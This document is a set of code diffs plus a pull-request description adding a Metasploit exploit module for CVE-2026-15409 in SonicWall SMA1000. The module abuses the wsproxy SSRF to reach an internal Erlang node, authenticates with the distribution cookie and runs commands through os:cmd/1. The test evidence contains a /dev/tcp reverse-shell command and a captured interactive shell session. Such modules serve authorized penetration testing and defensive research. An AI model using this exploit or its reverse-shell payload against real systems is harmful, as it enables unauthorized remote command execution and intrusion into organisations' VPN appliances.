+    name_packet = 'N'.b + [DIST_FLAGS, 0, node_name_data.bytesize].pack('Q>Nn') + node_name_data
+    send_handshake_packet(sock, name_packet)
+
+    status = recv_handshake_packet(sock)
+    raise "Unexpected Erlang status packet: #{status.inspect}" unless status.start_with?('s')
+
+    status_text = status.byteslice(1..).to_s
+    vprint_status("Erlang distribution status: #{status_text}")
+    raise "Erlang connection rejected: #{status_text}" unless %w[ok ok_simultaneous].include?(status_text)
+
+    challenge_packet = recv_handshake_packet(sock)
+    peer_flags, peer_challenge, peer_creation, peer_name = parse_challenge(challenge_packet)
+    vprint_good("Reached Erlang node #{peer_name}")
+    vprint_status(format('Peer flags: 0x%x', peer_flags))
+    vprint_status("Peer creation: #{peer_creation}")
+
+    my_challenge = SecureRandom.random_number(0x1_0000_0000)
+    reply = 'r'.b + [my_challenge].pack('N') + erlang_digest(datastore['ERLANG_COOKIE'], peer_challenge)
+    send_handshake_packet(sock, reply)
+
+    acknowledgement = recv_handshake_packet(sock)
+    raise "Unexpected Erlang acknowledgement: #{acknowledgement.inspect}" unless acknowledgement.start_with?('a')
+    raise 'Erlang cookie authentication failed' unless acknowledgement.byteslice(1..) == erlang_digest(datastore['ERLANG_COOKIE'], my_challenge)
+
+    vprint_good('Erlang cookie authentication succeeded')
+    result = rpc_call(sock, node_name, erlang_module, function, arguments)
+    [result, peer_name]
+  ensure
+    sock&.close
+  end
+
+  def format_term(value)
+    case value
+    when String
+      value
+    when Array
+      "{#{value.map { |item| format_term(item) }.join(', ')}}"
+    when Pid
+      "#Pid<#{value.node}.#{value.ident}.#{value.serial}>"
+    when Reference
+      "#Ref<#{value.node}.#{value.ident}>"
+    else
+      value.to_s
+    end
+  end
+
+  def check
+    result, peer_name = erlang_connect_and_rpc('erlang', 'node', [])
+    node_result = format_term(result)
+    return CheckCode::Unknown('The Erlang RPC completed but returned an empty node name') if node_result.blank?
+
+    CheckCode::Vulnerable("Authenticated to internal Erlang node #{peer_name}; erlang:node/0 returned #{node_result}")
+  rescue Rex::Proto::Http::WebSocket::ConnectionError => e
+    details = e.http_response ? "HTTP #{e.http_response.code}" : e.message
+    CheckCode::Safe("The wsproxy WebSocket upgrade was rejected: #{details}")
+  rescue Rex::ConnectionError, Rex::TimeoutError, EOFError => e
+    CheckCode::Unknown("Connection failed while testing the internal Erlang service: #{e.message}")
+  rescue RuntimeError, ArgumentError => e
+    if e.message.include?('cookie authentication failed')
+      CheckCode::Appears("The internal Erlang service was reached, but the configured cookie was rejected: #{e.message}")
+    else
+      CheckCode::Unknown("The internal protocol returned an unexpected result: #{e.message}")
+    end
+  end
+
+  def execute_command(command, _opts = {})
+    print_status("Executing command through Erlang os:cmd/1: #{command}")
+    result, peer_name = erlang_connect_and_rpc('os', 'cmd', [etf_string(command)])
+    output = format_term(result)
+    print_good("RPC completed through #{peer_name}")
+    print_line(output) unless output.blank?
+    output
+  rescue Rex::Proto::Http::WebSocket::ConnectionError => e
+    fail_with(Failure::Unreachable, "WebSocket connection failed: #{e.message}")
+  rescue Rex::ConnectionError, EOFError => e
+    fail_with(Failure::Unreachable, "Connection failed: #{e.message}")
+  rescue RuntimeError, ArgumentError => e
+    fail_with(Failure::UnexpectedReply, e.message)
+  end
+
+  def exploit
+    execute_command(payload.encoded)
+  rescue Rex::TimeoutError => e
+    # A reverse or bind command shell can keep Erlang os:cmd/1 blocked even
+    # after Metasploit has successfully registered the new session. Only
+    # suppress the transport timeout when the framework confirms a session.
+    raise e unless session_created?
+
+    print_good('Session created; ignoring the expected Erlang RPC/WebSocket timeout from the still-running command shell.')
+    vprint_status("WebSocket timeout after session creation: #{e.message}")
+  end
+end

--- a/modules/exploits/linux/http/sonicwall_sma1000_wsproxy_rce.rb
+++ b/modules/exploits/linux/http/sonicwall_sma1000_wsproxy_rce.rb
@@ -522,7 +522,7 @@ class MetasploitModule < Msf::Exploit::Remote
     node_result = format_term(result)
     return CheckCode::Unknown('The Erlang RPC completed but returned an empty node name') if node_result.blank?
 
-    CheckCode::Vulnerable("Authenticated to internal Erlang node #{peer_name}; erlang:node/0 returned #{node_result}")
+    CheckCode::Appears("Authenticated to internal Erlang node #{peer_name}; erlang:node/0 returned #{node_result}")
   rescue Rex::Proto::Http::WebSocket::ConnectionError => e
     details = e.http_response ? "HTTP #{e.http_response.code}" : e.message
     CheckCode::Safe("The wsproxy WebSocket upgrade was rejected: #{details}")

--- a/modules/exploits/linux/http/sonicwall_sma1000_wsproxy_rce.rb
+++ b/modules/exploits/linux/http/sonicwall_sma1000_wsproxy_rce.rb
@@ -59,7 +59,13 @@ class MetasploitModule < Msf::Exploit::Remote
   Pid = Struct.new(:node, :ident, :serial, :creation)
   Reference = Struct.new(:node, :ident, :creation)
 
-  class SmaWebSocketTransport
+  # Adapts the SMA Connect Agent WebSocket protocol to the socket-like
+  # sendall/recv interface required by the Erlang distribution implementation.
+  #
+  # WebSocket framing and connection handling are provided by Rex. This adapter
+  # handles SMA-specific Base64 encoding, the initial ready frame, and buffering
+  # for exact-length Erlang reads.
+  class SmaErlangWebSocketAdapter
     def initialize(wsock, read_timeout, verbose_proc = nil)
       @wsock = wsock
       @read_timeout = read_timeout
@@ -106,31 +112,20 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     def read_message(timeout: @read_timeout, allow_timeout: false)
-      Timeout.timeout(timeout) do
-        loop do
-          frame = @wsock.get_wsframe
-          return nil if frame.nil?
-
-          opcode = frame.header.opcode
-          payload = frame.payload_data.to_s.b
-
-          case opcode
-          when Rex::Proto::Http::WebSocket::Opcode::TEXT,
-               Rex::Proto::Http::WebSocket::Opcode::BINARY
-            return payload
-          when Rex::Proto::Http::WebSocket::Opcode::PING
-            pong = Rex::Proto::Http::WebSocket::Frame.new(
-              header: { opcode: Rex::Proto::Http::WebSocket::Opcode::PONG }
-            )
-            pong.payload_len = payload.bytesize
-            pong.payload_data = payload
-            pong.mask!
-            @wsock.put_wsframe(pong)
-          when Rex::Proto::Http::WebSocket::Opcode::CONNECTION_CLOSE
-            return nil
+      result = catch(:sma_websocket_message) do
+        Timeout.timeout(timeout) do
+          # Rex wsloop handles WebSocket fragmentation, masking, ping/pong, and
+          # close frames. Throwing from the callback returns one complete message
+          # without allowing wsloop to close the still-active WebSocket.
+          @wsock.wsloop do |data, _data_type|
+            throw :sma_websocket_message, data.to_s.b
           end
         end
+
+        nil
       end
+
+      result
     rescue Timeout::Error
       return nil if allow_timeout
 
@@ -249,7 +244,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     vprint_good('WebSocket upgrade succeeded')
-    SmaWebSocketTransport.new(wsock, datastore['WS_READ_TIMEOUT'], proc { |message| vprint_status(message) })
+    SmaErlangWebSocketAdapter.new(wsock, datastore['WS_READ_TIMEOUT'], proc { |message| vprint_status(message) })
   end
 
   def recv_exact(sock, size)

--- a/modules/exploits/linux/http/sonicwall_sma1000_wsproxy_rce.rb
+++ b/modules/exploits/linux/http/sonicwall_sma1000_wsproxy_rce.rb
@@ -167,7 +167,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [
             'Unix Command',
             {
-              'Platform' => 'unix',
+              'Platform' => %w[unix linux],
               'Arch' => ARCH_CMD,
               'Type' => :unix_cmd
             }

--- a/modules/exploits/linux/http/sonicwall_sma1000_wsproxy_rce.rb
+++ b/modules/exploits/linux/http/sonicwall_sma1000_wsproxy_rce.rb
@@ -177,7 +177,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'DefaultOptions' => {
           'RPORT' => 443,
           'SSL' => true,
-          'PAYLOAD' => 'cmd/unix/reverse_bash',
+          'FETCH_WRITABLE_DIR' => '/tmp',
           'WfsDelay' => 10
         },
         'Notes' => {

--- a/modules/exploits/linux/http/sonicwall_sma1000_wsproxy_rce.rb
+++ b/modules/exploits/linux/http/sonicwall_sma1000_wsproxy_rce.rb
@@ -158,7 +158,8 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'References' => [
           ['CVE', '2026-15409'],
-          ['URL', 'https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2026-0008']
+          ['URL', 'https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2026-0008'],
+          ['URL', 'https://www.rapid7.com/blog/post/etr-rapid7-mdr-team-discovers-new-sonicwall-sma1000-zero-days-being-actively-exploited-cve-2026-15409-cve-2026-15410/']
         ],
         'DisclosureDate' => '2026-07-14',
         'Privileged' => false,

--- a/modules/exploits/linux/http/sonicwall_sma1000_wsproxy_rce.rb
+++ b/modules/exploits/linux/http/sonicwall_sma1000_wsproxy_rce.rb
@@ -226,7 +226,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def erlang_node_name
     return datastore['NODE_NAME'] unless datastore['NODE_NAME'].blank?
 
-    "msf_#{Rex::Text.rand_text_numeric(6)}@127.0.0.1"
+    "#{Rex::Text.rand_text_numeric(6)}@127.0.0.1"
   end
 
   def connect_sma_websocket


### PR DESCRIPTION
## Description

This PR adds a new exploit module for **CVE-2026-15409**, a Server-Side Request Forgery (SSRF) vulnerability in the SonicWall SMA1000 WorkPlace `wsproxy` service.

The vulnerable `wsproxy` endpoint can proxy WebSocket traffic to internal services that are otherwise unreachable. This module leverages that capability to access the internal Erlang distribution service, authenticate using the known Erlang distribution cookie, and invoke `os:cmd/1` through Erlang RPC to execute arbitrary Unix commands in the context of the vulnerable SMA service.

Unlike exploitation, the `check` method performs a benign `erlang:node/0` RPC to validate the vulnerable communication path without executing an operating system command.

This module supports Unix command payloads, reverse shell payloads, AutoCheck, and multi-target execution (`RHOSTS`). A corresponding module documentation file has also been included.

**Related Issue:** 
None

## Breaking Changes
None

## Verification Steps

1. Start `msfconsole`.

2. Load the module:
   ```
   use exploit/linux/http/sonicwall_sma1000_wsproxy_rce
   ```

3. Configure the target:
   ```
   set RHOSTS <target>
   set TARGETURI /
   ```

4. Execute:
   ```
   check
   ```

5. Verify the module reports the target as vulnerable by successfully performing a benign Erlang `erlang:node/0` RPC.

6. Configure a command or reverse shell payload.

7. Execute:
   ```
   run
   ```
8. Verify arbitrary Unix command execution or successful session creation.



## Test Evidence

msf > use exploit/linux/http/sonicwall_sma1000_wsproxy_rce
[*] Using configured payload cmd/unix/reverse_bash
msf exploit(linux/http/sonicwall_sma1000_wsproxy_rce) > set RHOSTS 10.10.10.49-52
RHOSTS => 10.10.10.49-52
msf exploit(linux/http/sonicwall_sma1000_wsproxy_rce) > set PAYLOAD cmd/unix/reverse_bash
PAYLOAD => cmd/unix/reverse_bash
msf exploit(linux/http/sonicwall_sma1000_wsproxy_rce) > set LHOST 10.10.10.5
LHOST => 10.10.10.5
msf exploit(linux/http/sonicwall_sma1000_wsproxy_rce) > set LPORT 4444
LPORT => 4444
msf exploit(linux/http/sonicwall_sma1000_wsproxy_rce) > run
[*] Exploiting target 10.10.10.49
[*] Started reverse TCP handler on 10.10.10.5:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. The wsproxy WebSocket upgrade was rejected: The WebSocket connection failed "set ForceExploit true" to override check result.
[*] Exploiting target 10.10.10.50
[*] Started reverse TCP handler on 10.10.10.5:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. The wsproxy WebSocket upgrade was rejected: The WebSocket connection failed "set ForceExploit true" to override check result.
[*] Exploiting target 10.10.10.51
[*] Started reverse TCP handler on 10.10.10.5:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Authenticated to internal Erlang node couchdb@127.0.0.1; erlang:node/0 returned couchdb@127.0.0.1
[*] Executing command through Erlang os:cmd/1: bash -c '0<&85-;exec 85<>/dev/tcp/10.10.10.5/4444;sh <&85 >&85 2>&85'
[*] Command shell session 1 opened (10.10.10.5:4444 -> 10.10.10.51:39040) at 2026-07-16 09:54:26 -0400
[+] Session created; ignoring the expected Erlang RPC/WebSocket timeout from the still-running command shell.
[*] Session 1 created in the background.
[*] Exploiting target 10.10.10.52
[*] Started reverse TCP handler on 10.10.10.5:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. The wsproxy WebSocket upgrade was rejected: The WebSocket connection failed "set ForceExploit true" to override check result.
msf exploit(linux/http/sonicwall_sma1000_wsproxy_rce) > sessions

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         shell cmd/unix               10.10.10.5:4444 -> 10.10.10.51:39040 (10.10.10.51)

msf exploit(linux/http/sonicwall_sma1000_wsproxy_rce) > sessions -i 1
[*] Starting interaction with 1...

whoami
couchdb
ls -al
total 140
drwxr-xr-x  9 root root   4096 Jun 19 17:14 .
drwxr-xr-x  3 root root   4096 Jun 19 17:14 ..
-rw-r--r--  1 root root 104255 Aug 23  2025 LICENSE
drwxr-xr-x  2 root root   4096 Jun 19 17:14 bin
drwxr-xr-x  5 root root   4096 Jun 19 17:14 erts-13.1.5
drwxr-xr-x  4 root root   4096 Aug 23  2025 etc
drwxr-xr-x 52 root root   4096 Jun 19 17:14 lib
drwxr-xr-x  3 root root   4096 Aug 23  2025 releases
drwxr-xr-x  3 root root   4096 Aug 23  2025 share
drwxr-xr-x  3 root root   4096 Aug 23  2025 var
exit
[*] 10.10.10.51 - Command shell session 1 closed.


## Environment


| Field                                               | Details                                                  |
| ----------------------------------| -------------------------------------------------------- |
| **Operating System**                     | Ubuntu 25.04 (ARM64 development environment)             |
| **Target Software/Hardware**       | SonicWall SMA1000 appliance V12.5.0 vulnerable to CVE-2026-15409 |
| **Docker Image / Vagrant Setup** | Not applicable                                           |

## AI Usage Disclosure

OpenAI ChatGPT was used to assist with documentation drafting, wording refinement, code review, and implementation review. Vulnerability research, exploit development, testing, debugging, and validation were performed by the authors.


## Pre-Submission Checklist

* [x] Included a corresponding documentation markdown file in `documentation/modules`
* [x] No sensitive information (IP addresses, credentials, API keys, hashes) in code or documentation
* [x] Tested on the target environment specified in the Environment section above
* [ ] Included RSpec tests for library changes *(not applicable; no library changes)*
* [x] Read the CONTRIBUTING.md and module acceptance guidelines


<!-- After the PR has been submitted, check on the GitHub Actions status and review the job for any failures (red-X marks). Resolve these issues as they will be flagged by review. -->


